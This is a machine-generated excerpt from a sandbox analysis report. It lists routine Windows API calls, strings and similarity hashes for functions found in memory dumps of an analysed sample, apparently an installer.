                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                          • Opcode ID: 3bef515560e07c85fc91ca1f75fa33408194282e5ad1449b105b48e2d26e256f
                                                                                                                                                                                                                                                                          • Instruction ID: 4faa0e620455ca5c71f23fbcff7ecca549fd8c0ba52d071984874bd68527483e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bef515560e07c85fc91ca1f75fa33408194282e5ad1449b105b48e2d26e256f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2621D531E01220ABDB23AB64EC50A5A3768EF52760F268521E906A7299DB30FF00C7D1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00346618,0034657B,0034681C), ref: 003465B4
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 003465CA
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 003465DF
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                                                                                          • API String ID: 667068680-1718035505
                                                                                                                                                                                                                                                                          • Opcode ID: 9d4c38bdfe3a606deb78a8fba0568f680a9753acc25a5c275c651e3649648df7
                                                                                                                                                                                                                                                                          • Instruction ID: 25b5c969c255b6fd8bec22a9346280a8ad3e267cc2e32b5d74016896ac060989
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d4c38bdfe3a606deb78a8fba0568f680a9753acc25a5c275c651e3649648df7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FF0C2B2751632EB4F238F654C83AA622CCAB03346303547ED802DB640EB58FC46C796
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6A5D6A2C,?,?,6A547F2E,6A5D7224,6A59F850), ref: 6A56CF1B
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6A5D6A2C,?,6A547F2E,6A5D7224,6A59F850), ref: 6A56CF4E
                                                                                                                                                                                                                                                                          • RtlWakeAllConditionVariable.NTDLL ref: 6A56CFC5
                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,6A5D7224,6A59F850), ref: 6A56CFCF
                                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(?,6A5D7224,6A59F850), ref: 6A56CFDB
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                                                                                                                                                                                                                          • String ID: ,j]j
                                                                                                                                                                                                                                                                          • API String ID: 3916383385-747776563
                                                                                                                                                                                                                                                                          • Opcode ID: aac2b737d2ab7e84e0d98b1bb2fa418aa85c4cabc67c049332d5c5e4968827f5
                                                                                                                                                                                                                                                                          • Instruction ID: 7d2cd6285b8359ff9b840b0fc7d2c0a537b1a69728b21eace38169c5685a755f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aac2b737d2ab7e84e0d98b1bb2fa418aa85c4cabc67c049332d5c5e4968827f5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F012835620620EBCF00EF18E8089897BF9FB0E351703401AF942DBA10CB316C42EBA5
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 002229F6
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 002229FC
                                                                                                                                                                                                                                                                            • Part of subcall function 002246D0: GetProcessHeap.KERNEL32(?,?,DF534560,00000000), ref: 0022478A
                                                                                                                                                                                                                                                                            • Part of subcall function 002246D0: HeapFree.KERNEL32(00000000,?,?,DF534560,00000000), ref: 00224790
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00222C07
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00222C0D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                          • String ID: Lt=$Lt=
                                                                                                                                                                                                                                                                          • API String ID: 3859560861-2452508605
                                                                                                                                                                                                                                                                          • Opcode ID: b6aab5438171b2622cdacda55386f6c483b6bd2ced8a74f6ebfe7949ad4f593c
                                                                                                                                                                                                                                                                          • Instruction ID: 2a442751486b2a5bc35dae28df61a20cd5e528f6eae5f29afbaa93886374874a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6aab5438171b2622cdacda55386f6c483b6bd2ced8a74f6ebfe7949ad4f593c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9F18970D00249EFDB14DFA8C955BEEBBB4FF15314F2041ADE811AB291DB75AA08CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 663a2471c7cdb10a003cabac4071417572c1b103886090a4d40de77ad56833ab
                                                                                                                                                                                                                                                                          • Instruction ID: 2786784e83cbb66d30419b9951fbd557c71030300f7fce676dd79be7d4fd2f0e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 663a2471c7cdb10a003cabac4071417572c1b103886090a4d40de77ad56833ab
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABB1D3B1A04259EFDB12CF99C884BAEBBF5BF86304F014159E414AB282CF71DD42CB65
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0021A7EE
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0021A7F4
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(-000000FF,00000000), ref: 0021A81F
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,-000000FF,00000000), ref: 0021A825
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                          • String ID: Lt=$_TEMP
                                                                                                                                                                                                                                                                          • API String ID: 3859560861-100472605
                                                                                                                                                                                                                                                                          • Opcode ID: 2b088992078af9115b93a18a587e03160336678b1a860b5f994da38a36bb3d4c
                                                                                                                                                                                                                                                                          • Instruction ID: fd82e15f8c0ae4055108371115adf80a0465d975304e8b9a4e9101cbd9d4f2f3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b088992078af9115b93a18a587e03160336678b1a860b5f994da38a36bb3d4c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 249199B0D012499FDB10DFA8C985BEEBBF4FF58324F24426DE415A7281C7745A45CBA2
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6A55A93A
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6A55A95C
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6A55A984
                                                                                                                                                                                                                                                                          • __Getctype.LIBCPMT ref: 6A55AA65
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6A55AAC7
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6A55AAF1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1102183713-0
                                                                                                                                                                                                                                                                          • Opcode ID: 15cf2b3783b515a8d1ea7dc4a7c2135e566ffd3a8054bf396c4818f5d0f96e0b
                                                                                                                                                                                                                                                                          • Instruction ID: cd15eca0773cce8cea4f5b61c0a246fc036383fa6f895b5662f4dec4883a1a22
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15cf2b3783b515a8d1ea7dc4a7c2135e566ffd3a8054bf396c4818f5d0f96e0b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A61EEB0C00249DFDB11CF58C94479EBBF4FB05314F16825AD945AB352EB34AE84CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000001,?,6A570960,6A56D0E5,6A56D499,?,6A56D6D1,?,00000001,?,?,00000001,?,6A5C96D0,0000000C,6A56D7CA), ref: 6A56E88B
                                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6A56E899
                                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6A56E8B2
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,6A56D6D1,?,00000001,?,?,00000001,?,6A5C96D0,0000000C,6A56D7CA,?,00000001,?), ref: 6A56E904
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                          • Opcode ID: d84b3b62f1686ed16f7211f1f866d209f1887846abb93bc81af01c12e3d39d31
                                                                                                                                                                                                                                                                          • Instruction ID: f63823c648637924c0240ecfae81c12ee2db3973a3fe7a0a06e0a0b0c74bc262
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d84b3b62f1686ed16f7211f1f866d209f1887846abb93bc81af01c12e3d39d31
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9801883260A7117EA665D679AC8C94F37A4FB43678722022EF920B51F5EF619C025690
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,0034AE90,0034AE5C,?,?,001E6D6D,002B4950,?,00000008), ref: 0034AEA7
                                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0034AEB5
                                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0034AECE
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,0034AE90,0034AE5C,?,?,001E6D6D,002B4950,?,00000008), ref: 0034AF20
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                          • Opcode ID: 9e16e27f58981725d8238ecdb8cde9b561bb0259149fb3d44ebd269089f59b85
                                                                                                                                                                                                                                                                          • Instruction ID: 808edf77c0cb96fd38b97deb7c1b5e21dff851cfe85c15438ba8aa163d573338
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e16e27f58981725d8238ecdb8cde9b561bb0259149fb3d44ebd269089f59b85
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E014C7214DB115EA6272B78BCC59276BC8EB01BB7731023AF5209D0E3EF21AD049255
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(DF534560,00000000,00000000), ref: 002CBB1F
                                                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(?,?,?), ref: 002CBB8D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: NamePathShort
                                                                                                                                                                                                                                                                          • String ID: neutral$x64$x86
                                                                                                                                                                                                                                                                          • API String ID: 1295925010-1541741584
                                                                                                                                                                                                                                                                          • Opcode ID: 35d9d22ce4561009ec489e445b61f887ab62dd8a192454f4eb7708ff607c5aed
                                                                                                                                                                                                                                                                          • Instruction ID: 94e43bbed238fb8e73d8dac5b014a7a5e958ac62a542992b717733bd78bb7aca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35d9d22ce4561009ec489e445b61f887ab62dd8a192454f4eb7708ff607c5aed
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4B1D371900649AFDB01DFA4C849FDEFBB4EF15324F14825DE905AB281DB74AA54CBE0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,URL,00000000,?,AA831995,?,00000004), ref: 6A559A14
                                                                                                                                                                                                                                                                          • MoveFileW.KERNEL32(?,00000000), ref: 6A559D27
                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,00000004), ref: 6A559D6F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$DeleteMoveNameTemp
                                                                                                                                                                                                                                                                          • String ID: URL$url
                                                                                                                                                                                                                                                                          • API String ID: 788073729-346267919
                                                                                                                                                                                                                                                                          • Opcode ID: 9da72e9269ab718ce207567f806b567775378935a7640fb8a6f16159e78603f2
                                                                                                                                                                                                                                                                          • Instruction ID: 3dc0fc774a3a67051ce897a930069dce6bfb01d1547b998b3b91ef24c8c0c2f0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9da72e9269ab718ce207567f806b567775378935a7640fb8a6f16159e78603f2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34D145B0914269DADB24CF28CC98BDDBBB4FF54304F1042DAD409A7291EB796B94CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 002F4E64
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 002F4F0A
                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000000), ref: 002F503F
                                                                                                                                                                                                                                                                            • Part of subcall function 002B8580: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,DF534560,00000001,7508EB20,00000000), ref: 002B85CF
                                                                                                                                                                                                                                                                            • Part of subcall function 002B8580: ReadFile.KERNEL32(00000000,?,000003FF,?,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000,DF534560,00000001,7508EB20,00000000), ref: 002B8605
                                                                                                                                                                                                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 002F4F79
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • --verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 002F4EBE
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
